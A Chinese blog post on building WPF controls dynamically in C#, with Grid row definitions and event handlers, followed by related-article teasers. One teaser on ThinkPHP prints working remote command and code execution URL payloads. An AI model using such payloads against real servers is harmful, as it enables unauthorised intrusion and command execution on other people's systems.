【WPF】03 动态生成控件
说明
今天记录一篇关于动态生成控件的方法,也是反复查了一些资料,逐步完善成自己需要的方法,感觉还是比较好用的。通过这个需求,在网上也找了一些资料,发现了一个开源图形UI组件HandyControl,觉得比较好,虽然暂时还没怎么用上,但安装完成后,确实美化了原来wpf的一些控件形状。
gtiee地址:https://gitee.com/handyorg/HandyControl
Nuget管理包安装
编码实现
直接上代码说明了,文章就不详细描述什么原理什么过程的,将来需要直接问大模型就好了。
动态添加RowDefinitions和ColumnDefinitions
首先,在XAML中,定义一个空的Grid,然后在代码后台(C#)中动态地向这个Grid添加RowDefinitions和ColumnDefinitions,以及相应的子控件(如TextBox)。
XAML部分:
<ScrollViewer VerticalScrollBarVisibility="Auto" Margin="20,10,0,0" Height="380" Width="750" HorizontalAlignment="Left" VerticalAlignment="Top"><Grid x:Name="myDynamicGrid" Margin="5,5,5,5"><!-- 初始时不添加任何行,通过代码动态添加 --></Grid>
</ScrollViewer>
C#部分:
生成控件的部分
/// <summary>
/// 动态生成控件
/// </summary>
private void GenerateControls(int iRowsIndex)
{for (int i = 0; i < iRowsIndex; i++){RowDefinition rowDef = new RowDefinition{Height = new GridLength(50, GridUnitType.Pixel)};myDynamicGrid.RowDefinitions.Add(rowDef);myDynamicGrid.ColumnDefinitions.Add(new ColumnDefinition { Width = new GridLength(750, GridUnitType.Pixel) });// 添加TextBlockTextBlock textBlock = new TextBlock{Text = "我的TextBlock",VerticalAlignment = VerticalAlignment.Top,HorizontalAlignment = HorizontalAlignment.Left,Margin = new Thickness(0,5,0,0)};Grid.SetRow(textBlock , i);Grid.SetColumn(textBlock , 0);myDynamicGrid.Children.Add(textBlock );// 添加TextBox//这里因为安装了HandyControl,所以在选择相关控件的时候,需要做区分,控件对象前增加命名空间索引System.Windows.Controls.TextBox textBoxNum = new System.Windows.Controls.TextBox{Text = "我的TextBox",TextAlignment = TextAlignment.Center,VerticalAlignment = VerticalAlignment.Top,HorizontalAlignment = HorizontalAlignment.Left,Background = new SolidColorBrush(Colors.LightGray),Margin = new Thickness(520, 0, 0, 0)};Grid.SetRow(textBoxNum, i);Grid.SetColumn(textBoxNum, 0);myDynamicGrid.Children.Add(textBoxNum);// 生成32x32的小图string imagePath = "/test.png";Image image = new Image{Height = 30,Width = 30,Tag = i,VerticalAlignment= VerticalAlignment.Top,HorizontalAlignment= HorizontalAlignment.Left,Source = new BitmapImage(new Uri(imagePath, UriKind.Relative)),Margin = new Thickness(600, 0, 0, 0)};// 图片事件image.MouseUp += DynamicImage_MouseUp;Grid.SetRow(image, i);Grid.SetColumn(image, 0); myDynamicGrid.Children.Add(image);// 生成label控件Label label = new Label{Content = "我的Label",Width = 680, HorizontalAlignment = HorizontalAlignment.Left,VerticalAlignment = VerticalAlignment.Top,Margin= new Thickness(5, 0, 0, 0),Height = 30,TabIndex = i,HorizontalContentAlignment = HorizontalAlignment.Left,VerticalContentAlignment = VerticalAlignment.Center,FontSize = 14};Grid.SetRow(label, i);Grid.SetColumn(label, 0);myDynamicGrid.Children.Add(label);// 生成Button控件Button button = new Button{Content = "我的Button",Width = 30,Height = 30,Tag = i,TabIndex= i,VerticalAlignment = VerticalAlignment.Top,HorizontalAlignment = HorizontalAlignment.Right,Background = new SolidColorBrush(Colors.LightGray),BorderBrush = new SolidColorBrush(Colors.LightGray),Margin = new Thickness(0, 0, 70, 0)};buttons.Add(button);// 按钮事件button.Click += (sender, e) => ToggleListBoxes(button.TabIndex);Grid.SetRow(button, i);Grid.SetColumn(button, 0);myDynamicGrid.Children.Add(button);// 生成List控件ListBox listBox = new ListBox{Name = $"ListBox{i}",Visibility = Visibility.Visible,Width = 680,TabIndex = (int)i,VerticalAlignment = VerticalAlignment.Top,HorizontalAlignment = HorizontalAlignment.Left,BorderBrush = new SolidColorBrush(Colors.White),Margin = new Thickness(5, 30, 0, 0)};// ListBox 选择变更事件listBox.SelectionChanged += ListBox_SelectionChanged; // 可选:为ListBox生成选择变更事件处理器 listBoxes.Add(listBox);Grid.SetRow(listBox, i);Grid.SetColumn(listBox, 0);myDynamicGrid.Children.Add(listBox);iRows++;}if (iRows> 0){// 这里执行其他相关操作}
}
相关参考事件,来自于大模型的生成代码。
/// <summary>
/// 动态图片控件的鼠标抬起事件
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void DynamicImage_MouseUp(object sender, MouseButtonEventArgs e)
{//throw new NotImplementedException();Image mouseUP = sender as Image;if (mouseUP != null){int imgIndex = (int)mouseUP.Tag;for (int i = imgIndex; i < iRows; i++){strBarcode[i] = strBarcode[i + 1];strProName[i] = strProName[i + 1];strBat[i] = strBat[i + 1];strNum[i] = strNum[i + 1];}// 删除生成控件DeleteControls(iRows);// 删除grid容器的所有行myDynamicGrid.RowDefinitions.RemoveRange(0, iDetailsRows);// 整体行数减一iRows--;// 临时将全局的行数复制给变量iRowsAdd int iRowsAdd = iDetailsRows;if (iReAddDetails == 0){// 其他操作}else{iRows = 0;}// 删除一条数据后再次生成控件GenerateControls(iRowsAdd);}
}/// <summary>
/// 删除动态控件
/// </summary>
private void DeleteControls(int rowsToDelete)
{for (int i = InDetails.Children.Count - 1; i >= 0; i--){UIElement child = InDetails.Children[i];for (int j = 0; j < rowsToDelete; j++){if (Grid.GetRow(child) == j){InDetails.Children.Remove(child);}}}
}
/// <summary>
/// 按钮状态显示事件
/// </summary>
/// <param name="selectedIndex"></param>
private void ToggleListBoxes(int selectedIndex)
{foreach (var button in buttons){button.Content = button == buttons[selectedIndex] ? "▼" : "▲";}
}/// <summary>
/// ListBox事件
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void ListBox_SelectionChanged(object sender, SelectionChangedEventArgs e)
{ListBox listBox = sender as ListBox;if (listBox != null && listBox.SelectedItem != null){string listBoxName = listBox.Name;string selectedItem = listBox.SelectedItem.ToString();char[] delimiters = { ':' };string[] parts = selectedItem.Split(delimiters, StringSplitOptions.None);if (parts.Length > 1){strInputPostionRet = parts[1]; // 符号后面的内容 // 处理选中项 System.Windows.MessageBox.Show($"{strInputPostionRet}");}else{Console.WriteLine("No content after delimiter.");}}
}
以上就是 动态添加RowDefinitions和ColumnDefinitions的方式实现动态生成控件的方法,这种方式比较简单,也容易实现。 还有其他推荐方法,虽然没有尝试,但这里也写出来,留待以后参考。
使用ItemsControl和DataTemplate
ItemsControl是一个强大的控件,它可以用来显示一个集合中的项,并且每个项都可以通过DataTemplate来定义其呈现方式。你可以将ItemsControl的ItemsPanel设置为Grid,但通常我们会使用UniformGrid(如果行和列数量相同且自动分配)或保持默认的StackPanel/WrapPanel等,并通过DataTemplate来定义每个项的布局,间接实现类似Grid的效果。
然而,如果你确实需要一个标准的Grid布局,并且想要动态控制行和列,你可能需要结合使用ItemsControl和自定义的Panel或者通过代码动态添加Grid的RowDefinitions和ColumnDefinitions。
使用MVVM模式
在更复杂的应用程序中,你可能会想使用MVVM(Model-View-ViewModel)模式来管理你的UI逻辑。在这种情况下,你可以在ViewModel中定义一个集合,该集合表示你想要在Grid中显示的数据项。然后,在View(XAML)中,你可以使用ItemsControl绑定到这个集合,并通过DataTemplate定义每个项的布局。虽然这种方法不直接在XAML中定义Grid的行和列,但它提供了一种更加灵活和可维护的方式来管理动态内容。
相关文章:

【WPF】03 动态生成控件
说明 今天记录一篇关于动态生成控件的方法,也是反复查了一些资料,逐步完善成自己需要的方法,感觉还是比较好用的。通过这个需求,在网上也找了一些资料,发现了一个开源图形UI组件HandyControl,觉得比较好&a…...

调试LTE模块碰到的4字节对齐问题
在调试LTE模块,有两个模块,碰到两种4字节对齐问题,其错误提示都是类似如下的内容: DWC_OTG: dwc_otg_hcd_urb_enqueue urb->transfer_buffer address not align to 4-byte 0xee419e8e 都是USB控制器处理的数据时需要4字节对齐…...

一篇讲完HTML核心内容
一、HTML 1、 HTML概念 网页,是网站中的一个页面,通常是网页是构成网站的基本元素,是承载各种网站应用的平台。通俗的说,网站就是由网页组成的。通常我们看到的网页都是以htm或html后缀结尾的文件,俗称 HTML文件。 2、…...

2024icpc(Ⅱ)网络赛补题 G
2024icpc(Ⅱ)网络赛补题 G 题目链接:The 2024 ICPC Asia EC Regionals Online Contest (II) G、Game 题意: 给定Alice和Bob的每一轮的概率 p 0 , p 1 p_0, p_1 p0,p1 给定Alice和Bob的初始数字 x , y x,y x,y。 对于每一轮: 如果Al…...

AIGC时代!AI的“iPhone时刻”与投资机遇
AIGC时代!AI的“iPhone时刻”与投资机遇 前言AI的“iPhone时刻”与投资机遇 前言 AIGC,也就是人工智能生成内容,它就像是一股汹涌的浪潮,席卷了整个科技世界。它的出现,让我们看到了人工智能的无限潜力,也…...

Kubernetes调度单位Pod
Kubernetes调度单位Pod 1 Pod简介 不直接操作容器container。 一个 pod 可包含一或多个容器(container),它们共享一个 namespace(用户,网络,存储等),其中进程之间通过 localhost 本地…...

C语言指针篇
要想学好C语言,作为灵魂的指针那是必须要掌握的,而要想搞定指针,就不得不讲一下内存和地址之间的关系 内存和地址 计算机上的CPU(中央处理器)在处理数据的时候,需要的数据是在内存中读取的,处…...

Unity 使用Editor工具查找 Prefab 中的指定脚本
在 Unity 项目中,随着项目规模的扩大和 Prefab 数量的增加,管理和定位 Prefab 中的脚本变得更加复杂。为了提高开发效率,所以需要编写一个自定义的 Unity Editor 工具,帮助查找某个 Prefab 中是否使用了指定的脚本。本文将介绍如何…...

Frida-JSAPI:Interceptor使用
拦截器 Interceptor.attach(target, callbacks[, data]) 参数分析 target :target是一个NativePointer,用于指定想要拦截的函数的地址。callbacks :参数是一个包含一个或多个回调函数的对象。 onEnter(args) 回调函数,接收一个参…...

【深度学习】(3)--损失函数
文章目录 损失函数一、L1Loss损失函数1. 定义2. 优缺点3. 应用 二、NLLLoss损失函数1. 定义与原理2. 优点与注意3. 应用 三、MSELoss损失函数1. 定义与原理2. 优点与注意3. 应用 四、BCELoss损失函数1. 定义与原理2. 优点与注意3. 应用 五、CrossEntropyLoss损失函数1. 定义与原…...

git学习报告
文章目录 git学习报告如何配置vscode终端安装PowerShell安装 Microsoft.Powershell.Preview使用 git的使用关于团队合作 git指令本地命令:云端指令 git学习报告 如何配置vscode 安装powershell调教window终端,使其像Linux一样,通过Linux命令…...

Spring MVC的应用
目录 1、创建项目与maven坐标配置 2、核心配置 3、启动项目测试 4、不同请求参数在controller的配置 4.1 servlet API 4.2 简单类型 4.3 pojo类型 4.4 日期类型 4.5 restful风格4种操作类型 4.5.1 GET:获取资源 4.5.2 POST:新建资源 4.5.3 P…...

JavaEE: 深入探索TCP网络编程的奇妙世界(六)
文章目录 TCP核心机制TCP核心机制九: 面向字节流TCP核心机制十: 异常处理 小小的补充(URG 和 PSH)~TCP小结TCP/UDP 对比用UDP实现可靠传输(经典面试题) 结尾 TCP核心机制 上一篇文章JavaEE: 深入探索TCP网络编程的奇妙世界(五) 书接上文~ TCP核心机制九: 面向字节流 TCP是面…...

探秘 Web Bluetooth API:连接蓝牙设备的新利器
引言 随着物联网技术的快速发展,蓝牙设备在日常生活中扮演着越来越重要的角色。而在 Web 开发领域,Web Bluetooth API 的出现为我们提供了一种全新的方式来连接和控制蓝牙设备。本文将深入探讨 Web Bluetooth API 的使用方法和原理,帮助开发…...

Kubernetes Pod调度基础(kubernetes)
实验环境依旧是k8s快照,拉取本次实验所需的镜像文件; 然后在master节点上传已经编写好的yaml文件; 然后同步会话,导入镜像; pod控制器: 标签选择器--》标签: 标签: 在Kubernetes&…...

Angular由一个bug说起之十:npm Unsupported engine
我们在用npm下载包的时候,有时候会碰到这样的提示 这是npm的警告,说我们使用的nodejs版本与下载的包所要求的nodejs版本不一致。 这是因为有些包它对nodejs的版本有要求,然后就会在package.json文件里的engines字段里声明它所要求的nodejs版本…...

Android 开发高频面试题之——Flutter
Android开发高频面试题之——Java基础篇 flutter高频面试题记录 Flutter1. dart中的作用域与了解吗2. dart中. .. ...分别是什么意思?3. Dart 是不是单线程模型?如何运行的?4. Dart既然是单线程模型支持多线程吗?5. Future是什么6. Stream是什么7. Flutter 如何和原生交互…...

视频单目标跟踪研究
由于对视频单目标跟踪并不是很熟悉,所以首先得对该领域有个大致的了解。 视频目标跟踪是计算机视觉领域重要的基础性研究问题之一,是指在视频序列第一帧指定目标 后,在后续帧持续跟踪目标,即利用边界框(通常用矩形框表…...

若依vue3.0表格的增删改查文件封装
一、因若依生成的文件没进行封装,维护起来比较麻烦。所以自己简单的进行封装了一下 gitee代码(文件)地址:https://gitee.com/liu_yu_ting09/ruo_yi.git 二、封装的方法(下面绿色按钮进行全局封装一个JeecgListMixin.js…...

【已解决】如何使用JAVA 语言实现二分查找-二分搜索折半查找【算法】手把手学会二分查找【数据结构与算法】
文章目录 前言任务描述编程要求 输出样例:未查找到11元素! 二、代码实现总结理解不了考试的时候直接背下来就好了。 前言 [TOC]二分搜索 任务描述 折半查找(二分搜索) 设a[low..high]是当前的查找区间,首先确定该区间的中点位置…...

ERROR 1524 (HY000): Plugin ‘mysql_native_password‘ is not loaded
你遇到的错误是由于 MySQL 版本不再默认支持 mysql_native_password 认证插件导致的。从 MySQL 8.0 开始,默认的认证插件是 caching_sha2_password,而不是 mysql_native_password。 解释: 错误 ERROR 1524 (HY000): Plugin mysql_native_pa…...

.NET 6.0 WebAPI 使用JWT生成Token的验证授权
1.引入相关程序包JwtBearer注意版本: 2.配置文件appsettings.json写相关配置参数(也可不写,写在程序里面,数据库读取也是一样的) , //JWT加密"JWTToken": {"SecretKey": "jsaduwqe6asdjewejdue7dfmsdfu0sdfmwmsd8wfsd6",…...

M9410A VXT PXI 矢量收发信机,300/600/1200MHz带宽
M9410A PXI 矢量收发信机 -300/600/1200MHz带宽- M9410A VXT PXI 矢量收发信机,300/600/1200MHz带宽支持 5G 的 PXI 矢量收发信机(VXT)是一个 2 插槽模块,具有 1.2 GHz 的瞬时带宽 主要特点 Keysight M9410A VXT PXIe 矢量收发…...

用工厂模式演示springboot三种注入方式 | @Autowired
背景:看了个demo工厂模式,示例代码的工厂类是new出来的,但是实际项目中都是用springboot框架、bean都是会给容器管理的,所以在思考这个工厂类要交给springboot托管要怎么改。以下是总结笔记 依赖注入 1.工厂类用new实现2.工厂类用…...

es查询语法
查询关键词的含义: match: 用于进行全文搜索,分析查询文本并与倒排索引中的词项进行匹配。 term: 精确匹配,适用于非分析字段,如 keyword 类型。用于查找字段值完全相等的文档。 bool: 组合多个查询条件。可以使用 must…...

LabVIEW提高开发效率技巧----合理使用数据流与内存管理
理使用数据流和内存管理是LabVIEW开发中提高性能和稳定性的关键,特别是在处理大数据或高频率信号时,优化可以避免内存消耗过大、程序卡顿甚至崩溃。 1. 使用 Shift Register 进行内存管理 Shift Register(移位寄存器) 是 LabVIE…...

如何在 ECharts 中设置轴标签
在 ECharts 中,轴标签(Axis Label)是指 X 轴或 Y 轴上的刻度标签,用于显示轴上的数据值或分类名称。你可以通过配置 xAxis(X 轴)或 yAxis(Y 轴)的 axisLabel 属性来设置轴标签的样式…...

怎么用gitee做一个图片仓库,在md文档中用这个图片网络地址,然后显示图片
痛因:我为什么要这样做,呃,我一开始图片都是存本地地址的,放在和这个md文档同级的assets文件夹下面,这样子确实当时很方便,复制粘贴什么也不用管,但是想把这个文档分享给别的人的时候࿰…...

Thinkphp(TP)
1.远程命令执行 /index.php?sindex/think\app/invokefunction&functioncall_user_func_array&vars[0]system&vars[1][]whoami 2.远程代码执行 /index.php?sindex/think\app/invokefunction&functioncall_user_func_array&vars[0]phpinfo&vars[1][]…...

【艾思科蓝】前端框架巅峰对决:React、Vue与Angular的全面解析与实战指南
【JPCS独立出版】第三届能源与动力工程国际学术会议(EPE 2024)_艾思科蓝_学术一站式服务平台 更多学术会议请看:https://ais.cn/u/nuyAF3 引言 在快速发展的前端技术领域,选择合适的框架或库对于项目的成功至关重要。React、Vu…...